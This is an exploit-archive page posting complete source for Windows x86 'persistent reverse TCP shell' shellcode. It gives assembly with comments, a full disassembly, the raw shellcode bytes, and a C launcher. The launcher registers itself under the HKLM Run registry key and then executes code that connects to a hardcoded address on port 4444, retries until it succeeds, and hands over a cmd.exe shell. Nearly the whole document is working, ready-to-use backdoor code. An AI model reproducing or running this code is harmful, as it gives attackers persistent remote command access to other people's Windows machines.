exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows x86 Persistent Reverse TCP Shell Shellcode

Windows x86 Persistent Reverse TCP Shell Shellcode
Posted Sep 5, 2016
Authored by Roziul Hasan Khan Shifat

494 bytes small Microsoft Windows x86 persistent reverse TCP shell shellcode.

tags | shell, x86, tcp, shellcode
systems | windows
SHA-256 | f1db1ccdf479bf8278928587366ee7659410bf15a550926abfde9e17e284ac35

Windows x86 Persistent Reverse TCP Shell Shellcode

Change Mirror Download
/*
# Title : Windows x86 persistent reverse shell tcp
# Author : Roziul Hasan Khan Shifat
# Date : 04-09-2016
# Tested on : Windows 7 x86
*/


/*
Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent
*/


/*
section .text
global _start
_start:


xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll


mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY

mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx


xor edx,edx

g:

inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g

mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx


mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()

xor eax,eax
push eax

sub esp,24

lea esi,[esp]

mov [esi],dword edx ;GetProcAddress() at offset 0
mov edi,ecx ;kernel32.dll

;------------------------------
;finding address of CreateProcessA()

push 0x42424173
mov [esp+2],word ax
push 0x7365636f
push 0x72506574
push 0x61657243

lea eax,[esp]

push eax
push ecx

call edx
;----------------------------
add esp,16

mov [esi+4],dword eax ;CreateProcessA() at offset 4
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845

lea ecx,[esp]

push ecx
push edi

call dword [esi]

add esp,12

mov [esi+8],dword eax ;ExitProcess() at offset 8
;-----------------------------------------------------
;loading ws2_32.dll


xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c

lea ecx,[esp]

push ecx
push edi

call dword [esi]

add esp,12

xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
lea ecx,[esp]

push ecx
call eax
add esp,8

mov edi,eax ;ws2_32.dll

;-----------------------------------
;finding address of WSAStartup()
xor ecx,ecx
push 0x41417075
mov [esp+2],word cx
push 0x74726174
push 0x53415357

lea ecx,[esp]
push ecx
push eax

call dword [esi]
add esp,12

mov [esi+12],dword eax ;WSAStartup() at offset 12

;------------------------------------------
;finding address of WSASocketA()

xor ecx,ecx
push 0x42424174
mov [esp+2],word cx
push 0x656b636f
push 0x53415357

lea ecx,[esp]

push ecx
push edi

call dword [esi]
add esp,12

mov [esi+16],dword eax ;WSASocketA() at offset 16
;-----------------------------
;finding address of WSAConnect()
xor ecx,ecx
push 0x41417463
mov [esp+2],word cx
push 0x656e6e6f
push 0x43415357

lea ecx,[esp]

push ecx
push edi

call dword [esi]
add esp,12

mov [esi+20],dword eax ;WSAConnect() at offset 20
;------------------------------------------------

;WSAStartup(514, &WSADATA)

xor ecx,ecx
push ecx
mov cx,400

sub esp,ecx

lea ecx,[esp]

xor ebx,ebx
mov bx,514

push ecx
push ebx

call dword [esi+12]

;-------------------------------

;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)

xor ecx,ecx
push ecx
push ecx
push ecx

mov cl,6
push ecx

sub ecx,5
push ecx

inc ecx
push ecx

call dword [esi+16]

xchg edi,eax ;SOCKET

;--------------------------------------------------
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx

mov [esp],byte 2
mov [esp+2],word 0x5c11 ;port 4444 (change it if U want)
mov [esp+4],dword 0x81e8a8c0 ;Change it

connect:
xor ecx,ecx
lea ebx,[esp]

push ecx
push ecx
push ecx
push ecx


mov cl,16


push ecx
push ebx
push edi

call dword [esi+20]
xor ecx,ecx

cmp eax,ecx
jnz connect
;----------------------------------------------

xor ecx,ecx

sub esp,16
lea edx,[esp] ;PROCESS_INFORMATION

push edi
push edi
push edi
push ecx
push word cx
push word cx

mov cl,255
inc ecx

push ecx
xor ecx,ecx

push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx

mov cl,68

push ecx

lea ecx,[esp]


xor edx,edx
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63

lea edx,[esp]
;-----------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info)

push ebx
push ecx

xor ecx,ecx

push ecx
push ecx
push ecx

inc ecx
push ecx
xor ecx,ecx

push ecx
push ecx
push edx
push ecx

call dword [esi+4]

push eax
call dword [esi+8]
*/


/*
Disassembly of section .text:

00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx

00000023 <g>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <g>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <g>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <g>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 c0 xor %eax,%eax
4d: 50 push %eax
4e: 83 ec 18 sub $0x18,%esp
51: 8d 34 24 lea (%esp),%esi
54: 89 16 mov %edx,(%esi)
56: 89 cf mov %ecx,%edi
58: 68 73 41 42 42 push $0x42424173
5d: 66 89 44 24 02 mov %ax,0x2(%esp)
62: 68 6f 63 65 73 push $0x7365636f
67: 68 74 65 50 72 push $0x72506574
6c: 68 43 72 65 61 push $0x61657243
71: 8d 04 24 lea (%esp),%eax
74: 50 push %eax
75: 51 push %ecx
76: ff d2 call *%edx
78: 83 c4 10 add $0x10,%esp
7b: 89 46 04 mov %eax,0x4(%esi)
7e: 31 c9 xor %ecx,%ecx
80: 68 65 73 73 41 push $0x41737365
85: 88 4c 24 03 mov %cl,0x3(%esp)
89: 68 50 72 6f 63 push $0x636f7250
8e: 68 45 78 69 74 push $0x74697845
93: 8d 0c 24 lea (%esp),%ecx
96: 51 push %ecx
97: 57 push %edi
98: ff 16 call *(%esi)
9a: 83 c4 0c add $0xc,%esp
9d: 89 46 08 mov %eax,0x8(%esi)
a0: 31 c9 xor %ecx,%ecx
a2: 51 push %ecx
a3: 68 61 72 79 41 push $0x41797261
a8: 68 4c 69 62 72 push $0x7262694c
ad: 68 4c 6f 61 64 push $0x64616f4c
b2: 8d 0c 24 lea (%esp),%ecx
b5: 51 push %ecx
b6: 57 push %edi
b7: ff 16 call *(%esi)
b9: 83 c4 0c add $0xc,%esp
bc: 31 c9 xor %ecx,%ecx
be: 68 6c 6c 41 41 push $0x41416c6c
c3: 66 89 4c 24 02 mov %cx,0x2(%esp)
c8: 68 33 32 2e 64 push $0x642e3233
cd: 68 77 73 32 5f push $0x5f327377
d2: 8d 0c 24 lea (%esp),%ecx
d5: 51 push %ecx
d6: ff d0 call *%eax
d8: 83 c4 08 add $0x8,%esp
db: 89 c7 mov %eax,%edi
dd: 31 c9 xor %ecx,%ecx
df: 68 75 70 41 41 push $0x41417075
e4: 66 89 4c 24 02 mov %cx,0x2(%esp)
e9: 68 74 61 72 74 push $0x74726174
ee: 68 57 53 41 53 push $0x53415357
f3: 8d 0c 24 lea (%esp),%ecx
f6: 51 push %ecx
f7: 50 push %eax
f8: ff 16 call *(%esi)
fa: 83 c4 0c add $0xc,%esp
fd: 89 46 0c mov %eax,0xc(%esi)
100: 31 c9 xor %ecx,%ecx
102: 68 74 41 42 42 push $0x42424174
107: 66 89 4c 24 02 mov %cx,0x2(%esp)
10c: 68 6f 63 6b 65 push $0x656b636f
111: 68 57 53 41 53 push $0x53415357
116: 8d 0c 24 lea (%esp),%ecx
119: 51 push %ecx
11a: 57 push %edi
11b: ff 16 call *(%esi)
11d: 83 c4 0c add $0xc,%esp
120: 89 46 10 mov %eax,0x10(%esi)
123: 31 c9 xor %ecx,%ecx
125: 68 63 74 41 41 push $0x41417463
12a: 66 89 4c 24 02 mov %cx,0x2(%esp)
12f: 68 6f 6e 6e 65 push $0x656e6e6f
134: 68 57 53 41 43 push $0x43415357
139: 8d 0c 24 lea (%esp),%ecx
13c: 51 push %ecx
13d: 57 push %edi
13e: ff 16 call *(%esi)
140: 83 c4 0c add $0xc,%esp
143: 89 46 14 mov %eax,0x14(%esi)
146: 31 c9 xor %ecx,%ecx
148: 51 push %ecx
149: 66 b9 90 01 mov $0x190,%cx
14d: 29 cc sub %ecx,%esp
14f: 8d 0c 24 lea (%esp),%ecx
152: 31 db xor %ebx,%ebx
154: 66 bb 02 02 mov $0x202,%bx
158: 51 push %ecx
159: 53 push %ebx
15a: ff 56 0c call *0xc(%esi)
15d: 31 c9 xor %ecx,%ecx
15f: 51 push %ecx
160: 51 push %ecx
161: 51 push %ecx
162: b1 06 mov $0x6,%cl
164: 51 push %ecx
165: 83 e9 05 sub $0x5,%ecx
168: 51 push %ecx
169: 41 inc %ecx
16a: 51 push %ecx
16b: ff 56 10 call *0x10(%esi)
16e: 97 xchg %eax,%edi
16f: 31 c9 xor %ecx,%ecx
171: 51 push %ecx
172: 51 push %ecx
173: 51 push %ecx
174: 51 push %ecx
175: c6 04 24 02 movb $0x2,(%esp)
179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp)
187: 81

00000188 <connect>:
188: 31 c9 xor %ecx,%ecx
18a: 8d 1c 24 lea (%esp),%ebx
18d: 51 push %ecx
18e: 51 push %ecx
18f: 51 push %ecx
190: 51 push %ecx
191: b1 10 mov $0x10,%cl
193: 51 push %ecx
194: 53 push %ebx
195: 57 push %edi
196: ff 56 14 call *0x14(%esi)
199: 31 c9 xor %ecx,%ecx
19b: 39 c8 cmp %ecx,%eax
19d: 75 e9 jne 188 <connect>
19f: 31 c9 xor %ecx,%ecx
1a1: 83 ec 10 sub $0x10,%esp
1a4: 8d 14 24 lea (%esp),%edx
1a7: 57 push %edi
1a8: 57 push %edi
1a9: 57 push %edi
1aa: 51 push %ecx
1ab: 66 51 push %cx
1ad: 66 51 push %cx
1af: b1 ff mov $0xff,%cl
1b1: 41 inc %ecx
1b2: 51 push %ecx
1b3: 31 c9 xor %ecx,%ecx
1b5: 51 push %ecx
1b6: 51 push %ecx
1b7: 51 push %ecx
1b8: 51 push %ecx
1b9: 51 push %ecx
1ba: 51 push %ecx
1bb: 51 push %ecx
1bc: 51 push %ecx
1bd: 51 push %ecx
1be: 51 push %ecx
1bf: b1 44 mov $0x44,%cl
1c1: 51 push %ecx
1c2: 8d 0c 24 lea (%esp),%ecx
1c5: 31 d2 xor %edx,%edx
1c7: 68 65 78 65 41 push $0x41657865
1cc: 88 54 24 03 mov %dl,0x3(%esp)
1d0: 68 63 6d 64 2e push $0x2e646d63
1d5: 8d 14 24 lea (%esp),%edx
1d8: 53 push %ebx
1d9: 51 push %ecx
1da: 31 c9 xor %ecx,%ecx
1dc: 51 push %ecx
1dd: 51 push %ecx
1de: 51 push %ecx
1df: 41 inc %ecx
1e0: 51 push %ecx
1e1: 31 c9 xor %ecx,%ecx
1e3: 51 push %ecx
1e4: 51 push %ecx
1e5: 52 push %edx
1e6: 51 push %ecx
1e7: ff 56 04 call *0x4(%esi)
1ea: 50 push %eax
1eb: ff 56 08 call *0x8(%esi)
*/


#include<stdio.h>
#include<windows.h>
#include<string.h>

char shellcode[]=\

"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";

int main(int li,char *a[])
{
char info[200];
DWORD l;
HKEY i;


RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i);
int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l);

if(i!=0)
{
RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0]));
RegCloseKey(i);
}
else
RegCloseKey(i);




int mode;



if(li==1)
mode=1;
else
mode=atoi(a[1]);

switch(mode)
{



case 78:
(* (int(*)())shellcode )();
break;

case 1:
default:
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
break;
}


return 0;

}

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close